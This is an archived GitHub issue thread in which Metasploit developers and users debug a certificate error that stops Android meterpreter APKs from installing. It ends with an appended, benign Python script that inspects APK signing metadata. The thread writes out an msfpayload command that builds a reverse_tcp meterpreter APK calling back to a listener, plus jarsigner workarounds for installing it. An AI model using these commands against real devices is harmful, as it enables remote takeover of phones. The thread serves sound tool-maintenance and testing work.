This repository has been archived by the owner on Jan 22, 2024. It is now read-only.

Meterpreter apk receives "INSTALL_PARSE_FAILED_NO_CERTIFICATES" error. #21

frenchbeard opened this issue Oct 29, 2014 · 11 comments

@frenchbeard

I've recently tried to use the Android meterpreter (reverse_tcp, http and https), and all APKs generated from msfpayload give the same error on install (be it through adb or direct install on the phone). The error is "INSTALL_PARSE_FAILED_NO_CERTIFICATES", on both Samsung Galaxy S4 LTE-A's CyanogenMod11 and Alcatel One Touch stock 4.4.2.
I do not know if the problem lies with the android meterpreter itself or msfpayload.

@timwr
Contributor

timwr commented Oct 29, 2014

Thanks for reporting @audhulma, unfortunately I'm unable to reproduce it here on an S4 UK edition. Could you provide the output of "adb logcat" when you try to install the apk please?
http://developer.android.com/tools/help/adb.html

I'm installing with:

./msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 R > android.apk
adb install android.apk
(obviously, but to avoid confusion).

Could you also try signing it manually with the command:

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android android.apk androiddebugkey
adb install android.apk

to see if that works around the issue?

@frenchbeard
Author

Logcat returns :

W/linker (25942): libvcodec_oal.so has text relocations. This is wasting memory and is a security risk. Please fix.
W/linker (25942): libvp8dec_sa.ca7.so has text relocations. This is wasting memory and is a security risk. Please fix.
W/linker (25942): libvp9dec_sa.ca7.so has text relocations. This is wasting memory and is a security risk. Please fix.
W/linker (25942): libvc1dec_sa.ca7.so has text relocations. This is wasting memory and is a security risk. Please fix.
I/PackageParser( 668): com.metasploit.stage: compat added android.permission.WRITE_EXTERNAL_STORAGE
E/PackageParser( 668): Package com.metasploit.stage has no certificates at entry classes.dex; ignoring!

The rest of the log is just the usual for an install through adb.
Using jarsigner manually seems to resolve the problem. I think it comes from my metasploit installation more so than anything else; I have already reinstalled it once to try and fix this issue, but to no avail.

@timwr
Contributor

timwr commented Nov 17, 2014

Apologies @audhulma, I can't reproduce, however @jvennix-r7 can! What OS are you running on?

@timwr timwr reopened this Nov 17, 2014
@jvennix-r7
Contributor

Solved. Something strange with the openssl lib causes it to behave differently when you forget to sign the cert. I fixed the issue here, closing this now:

rapid7/metasploit-framework#4186

@timwr
Contributor

timwr commented Jan 29, 2015

Weird, I'm seeing this on an HTC Desire HD, 2.3.5 (but not on a Galaxy S4):

E/PackageParser( 1374): Package com.metasploit.stage has no certificates at entry classes.dex; ignoring!

@frenchbeard
Author

Had the same on the Galaxy S4, but using jarsigner as described in a previous comment made it behave normally (tedious to do so each time though...).
@timwr: sorry for the lack of answer to your question, the notification must have gotten lost on my side. Regarding the OS: nightlies of CyanogenMod (ks01lte) for the phone, Arch Linux for the computer where the payload was generated.

@bcook-r7
Contributor

Just to add in a couple of data points, I started with an ancient HTC Vision running cyanogenmod 7.2rc1 (Android 2.3 something), it accepted the apk without issue. I then updated it to an AOSP 4.2.2 derivative and INSTALL_PARSE_FAILED_NO_CERTIFICATES showed up.

@timwr timwr added the bug label Mar 16, 2015
@timwr
Contributor

timwr commented Mar 16, 2015

I can reproduce this but am no closer to fixing it. I'll try to find some time for this soon.

@timwr timwr reopened this Mar 16, 2015
@toabi

toabi commented Apr 13, 2015

I have the same problem, here is what the log said (excerpt):

…
D/AndroidRuntime(12952): Calling main entry com.android.commands.pm.Pm
I/ApplicationPolicy( 2146): isApplicationInstallationEnabled
W/PackageManager( 2146): verifying app can be installed or not
I/PackageParser( 2146): com.metasploit.stage: compat added android.permission.WRITE_EXTERNAL_STORAGE
D/dalvikvm( 2146): WAIT_FOR_CONCURRENT_GC blocked 0ms
E/PackageParser( 2146): Package com.metasploit.stage has no certificates at entry classes.dex; ignoring
…

Sorry, I just saw somebody posted it before.

Thing is, I cannot even use the jarsigner method to get this apk installed. The phone is on android 4.1.2.

:edit: Fun fact: The jarsigner method works as soon as I add -tsa http://timestamp.digicert.com as an argument.

@frenchbeard
Author

Hi @toabi, to be honest with you, I haven't had this problem in a (very) long while, but this log sure does look familiar.
I guess you already checked, but is everything up to date on your end?

Regarding the "-tsa", I never had to go that far, a simple jarsigner with my own keystore was sufficient to bypass said problem. Do you have any anti-virus / malware software on the phone, by any chance?

@timwr timwr self-assigned this May 8, 2015
@timwr
Contributor

timwr commented May 8, 2015

Quick update:
I can reproduce this with an android-15 x86 emulator, which should in theory make it easier to fix.
I was still getting the error with -tsa http://timestamp.digicert.com
This workaround seems to work for me:

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey
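
Added example, not part of the thread and not code from the Metasploit project: a small inspector for the JAR (v1) signing metadata that PackageParser complains about in the logs above, reporting which entries lack a manifest digest and which digest algorithms the signature files use. The function names and the in-memory sample APKs are constructed for illustration; it only reads metadata and performs no cryptographic verification.

```python
import base64, hashlib, io, re, zipfile

SIG_BLOCK = re.compile(r"META-INF/[^/]+\.(RSA|DSA|EC)$", re.I)
SIG_FILE = re.compile(r"META-INF/[^/]+\.SF$", re.I)
DIGEST_ATTR = re.compile(r"^([A-Za-z0-9-]+?)-Digest", re.M)

def manifest_sections(text):
    """Map entry name -> manifest section, after unfolding continuation lines."""
    text = text.replace("\r\n", "\n").replace("\n ", "")
    found = {}
    for block in text.split("\n\n"):
        name = re.search(r"^Name: (.+)$", block, re.M)
        if name:
            found[name.group(1)] = block
    return found

def inspect_v1_signature(apk_bytes):
    """Report JAR (v1) signing metadata of an APK; performs no signature verification."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        texts = {n: z.read(n).decode("utf-8", "replace") for n in names
                 if n == "META-INF/MANIFEST.MF" or SIG_FILE.match(n)}
    sections = manifest_sections(texts.get("META-INF/MANIFEST.MF", ""))
    payload = [n for n in names if not n.startswith("META-INF/") and not n.endswith("/")]
    return {
        "signature_blocks": [n for n in names if SIG_BLOCK.match(n)],
        "signature_files": [n for n in texts if SIG_FILE.match(n)],
        "unlisted_entries": [n for n in payload if n not in sections],
        "digest_algs": {a for t in texts.values() for a in DIGEST_ATTR.findall(t)},
    }

def build_sample(alg=None):
    """Constructed sample APK. CERT.RSA holds placeholder bytes, not a real PKCS#7 block."""
    def attr(data, suffix=""):
        digest = hashlib.new(alg.replace("-", "").lower(), data).digest()
        return f"{alg}-Digest{suffix}: {base64.b64encode(digest).decode()}\r\n"
    dex, buf = b"constructed bytes standing in for classes.dex", io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", dex)
        if alg:
            section = "Name: classes.dex\r\n" + attr(dex) + "\r\n"
            manifest = "Manifest-Version: 1.0\r\n\r\n" + section
            sf = ("Signature-Version: 1.0\r\n" + attr(manifest.encode(), "-Manifest")
                  + "\r\nName: classes.dex\r\n" + attr(section.encode()) + "\r\n")
            z.writestr("META-INF/MANIFEST.MF", manifest)
            z.writestr("META-INF/CERT.SF", sf)
            z.writestr("META-INF/CERT.RSA", b"placeholder")
    return buf.getvalue()

if __name__ == "__main__":
    for label in (None, "SHA-256", "SHA1"):
        print(label, inspect_v1_signature(build_sample(label)))
```

Running it on an APK that installs and on one that fails shows whether they differ in `digest_algs`, which is the setting the `-digestalg SHA1` workaround above changes.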
